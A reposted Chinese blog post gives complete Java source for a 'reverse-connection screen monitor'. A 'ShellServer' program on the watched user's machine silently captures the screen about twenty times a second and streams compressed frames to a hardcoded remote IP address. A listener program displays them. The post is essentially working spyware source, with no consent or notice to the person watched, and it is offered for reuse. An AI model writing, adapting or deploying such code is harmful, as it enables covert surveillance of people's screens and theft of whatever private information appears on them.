JAVA实现反向连接_____屏幕监视 (TCP)

简介:

JAVA实现反向连接_____屏幕监视 (TCP)

//以下这个为服务器类 被监视的用户

import com.sun.image.codec.jpeg.JPEGCodec;
import com.sun.image.codec.jpeg.JPEGImageEncoder;
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import java.io.FileOutputStream;
import java.io.IOException;
import java.net.Socket;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
public class ShellServer extends Thread{
   private Dimension screenSize;
   private Rectangle rectangle;
   private Robot robot;
   private JPEGImageEncoder encoder;
  
   public ShellServer() {
     screenSize = Toolkit.getDefaultToolkit().getScreenSize();
     rectangle = new Rectangle(screenSize);//可以指定捕获屏幕区域
     try{
       robot = new Robot();
     }catch(Exception e){
       e.printStackTrace();
       System.out.println(e);
     }
   }
 public void run(){
  ZipOutputStream os = null;
  Socket socket=null;
  while (true){
   try{
    socket = new Socket("220.173.44.158",5000);//连接远程IP
    BufferedImage image = robot.createScreenCapture(rectangle);//捕获制定屏幕矩形区域
    os = new ZipOutputStream(socket.getOutputStream());//加入压缩流
    //os = new ZipOutputStream(new FileOutputStream("C:/1.zip"));
    
    os.setLevel(9);
    os.putNextEntry(new ZipEntry("1.jpg"));
    JPEGCodec.createJPEGEncoder(os).encode(image);//图像编码成JPEG
    os.close();
    Thread.sleep(50);//每秒20帧
   }catch(Exception e){
    e.printStackTrace();
   }finally{
    if(os!=null){
     try{
      os.close();
     }catch(Exception ioe){}
    }
    if(socket!=null){
     try {
      socket.close();
     } catch (IOException e) {
     }
    }
   }
     }
 }
 public static void main(String[] args) {
  new ShellServer().start();
 }
}
//以下这个为客户端类 监视者

import java.awt.*;
import java.awt.image.BufferedImage;
import javax.imageio.ImageIO;
import javax.swing.*;
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.zip.ZipInputStream;
public class ShellClient  extends JFrame{
 Dimension screenSize;

 public ShellClient() {
  super();
  screenSize = Toolkit.getDefaultToolkit().getScreenSize();
  this.setSize(800, 640);//设置Frame初始
  Screen p = new Screen();//屏幕类
  Container c = this.getContentPane();
  c.setLayout(new BorderLayout());//布局
  c.add(p,"Center");//添加一个Panel
  new Thread(p).start();//开启线程
  this.show();//显示本Frame
 }
 public static void main(String[] args){
  new ShellClient();
 }
 class Screen extends JPanel implements Runnable{
  private Image cimage;
  public void run(){
   ServerSocket ss=null;
   try{
    ss=new ServerSocket(5000);//探听5000端口的连接
    while(true){
     Socket s=null;
     try{
      s=ss.accept();//获取一个SOCKET
      ZipInputStream  zis=new ZipInputStream(s.getInputStream());
      zis.getNextEntry();//获得ZIP流的ENTRY
      cimage = ImageIO.read(zis);//把ZIP流转换为图片
      //cimage = ImageIO.read(new FileInputStream("c:/1.jpg"));
      repaint();//重画
     }catch(Exception e){
      e.printStackTrace();
     }finally{
      if(s!=null){
       try {s.close();} catch (IOException e) {}
      }
     }
    }
   }catch(Exception e){}
   finally{
    if(ss!=null){
     try {ss.close();} catch (IOException e) {}
    }
   }
  }
  public Screen() {
   super();
   this.setLayout(null);
  }
  public void paint(Graphics g){
   super.paint(g);
   Graphics2D g2 = (Graphics2D) g;
   g2.drawImage(cimage, 0, 0, null);
  }
 }
}

主要采用了 TCP协议+压缩流~ 速度还可以!




      本文转自yjflinchong 51CTO博客,原文链接:http://blog.51cto.com/yjflinchong/1165020,如需转载请自行联系原作者



相关文章
|
1月前
|
存储 Java 关系型数据库
高效连接之道:Java连接池原理与最佳实践
在Java开发中,数据库连接是应用与数据交互的关键环节。频繁创建和关闭连接会消耗大量资源,导致性能瓶颈。为此,Java连接池技术通过复用连接,实现高效、稳定的数据库连接管理。本文通过案例分析,深入探讨Java连接池的原理与最佳实践,包括连接池的基本操作、配置和使用方法,以及在电商应用中的具体应用示例。
64 5
|
1月前
|
SQL Java 数据库连接
在Java应用中,数据库访问常成为性能瓶颈。连接池技术通过预建立并复用数据库连接,有效减少连接开销,提升访问效率
在Java应用中,数据库访问常成为性能瓶颈。连接池技术通过预建立并复用数据库连接,有效减少连接开销,提升访问效率。本文介绍了连接池的工作原理、优势及实现方法,并提供了HikariCP的示例代码。
48 3
|
2月前
|
Java 关系型数据库 MySQL
如何用java的虚拟线程连接数据库
本文介绍了如何使用Java虚拟线程连接数据库,包括设置JDK版本、创建虚拟线程的方法和使用虚拟线程连接MySQL数据库的示例代码。
60 6
如何用java的虚拟线程连接数据库
|
1月前
|
Java 数据库连接 数据库
深入探讨Java连接池技术如何通过复用数据库连接、减少连接建立和断开的开销,从而显著提升系统性能
在Java应用开发中,数据库操作常成为性能瓶颈。本文通过问题解答形式,深入探讨Java连接池技术如何通过复用数据库连接、减少连接建立和断开的开销,从而显著提升系统性能。文章介绍了连接池的优势、选择和使用方法,以及优化配置的技巧。
31 1
|
1月前
|
Java 数据库连接 数据库
Java连接池在数据库性能优化中的重要作用。连接池通过预先创建和管理数据库连接,避免了频繁创建和关闭连接的开销
本文深入探讨了Java连接池在数据库性能优化中的重要作用。连接池通过预先创建和管理数据库连接,避免了频繁创建和关闭连接的开销,显著提升了系统的响应速度和吞吐量。文章介绍了连接池的工作原理,并以HikariCP为例,展示了如何在Java应用中使用连接池。通过合理配置和优化,连接池技术能够有效提升应用性能。
47 1
|
2月前
|
SQL Java 关系型数据库
java连接mysql查询数据(基础版,无框架)
【10月更文挑战第12天】该示例展示了如何使用Java通过JDBC连接MySQL数据库并查询数据。首先在项目中引入`mysql-connector-java`依赖,然后通过`JdbcUtil`类中的`main`方法实现数据库连接、执行SQL查询及结果处理,最后关闭相关资源。
101 6
|
2月前
|
SQL 存储 Java
Java中使用ClickHouseDriver连接和基本操作
通过上述步骤,你可以轻松地在Java应用中集成ClickHouse数据库,执行基本的CRUD操作。需要注意的是,实际开发中应当根据实际情况调整数据库连接配置(如URL中的主机、端口、数据库名等),并根据应用需求选择合适的异常处理策略,确保代码的健壮性和资源的有效管理。此外,对于复杂查询和大批量数据处理,建议充分利用ClickHouse的特性(如分布式处理、列式存储优化等),以进一步提升性能。
152 2
|
2月前
|
Java 关系型数据库 MySQL
数据库的连接用Java
本文介绍了如何使用Java连接MySQL数据库,包括注册JDBC驱动、创建数据库连接URL、设置数据库用户和密码、建立连接以及关闭连接的完整代码示例。
44 0
数据库的连接用Java
|
3月前
|
存储 SQL 分布式计算
Java连接阿里云MaxCompute例
要使用Java连接阿里云MaxCompute数据库,首先需在项目中添加MaxCompute JDBC驱动依赖,推荐通过Maven管理。避免在代码中直接写入AccessKey,应使用环境变量或配置文件安全存储。示例代码展示了如何注册驱动、建立连接及执行SQL查询。建议使用RAM用户提升安全性,并根据需要配置时区和公网访问权限。具体步骤和注意事项请参考阿里云官方文档。
375 10
|
4月前
|
SQL Java 数据库连接
Java开发者必知:JDBC连接数据库的“三大法宝”
Java开发者必知:JDBC连接数据库的“三大法宝”
38 7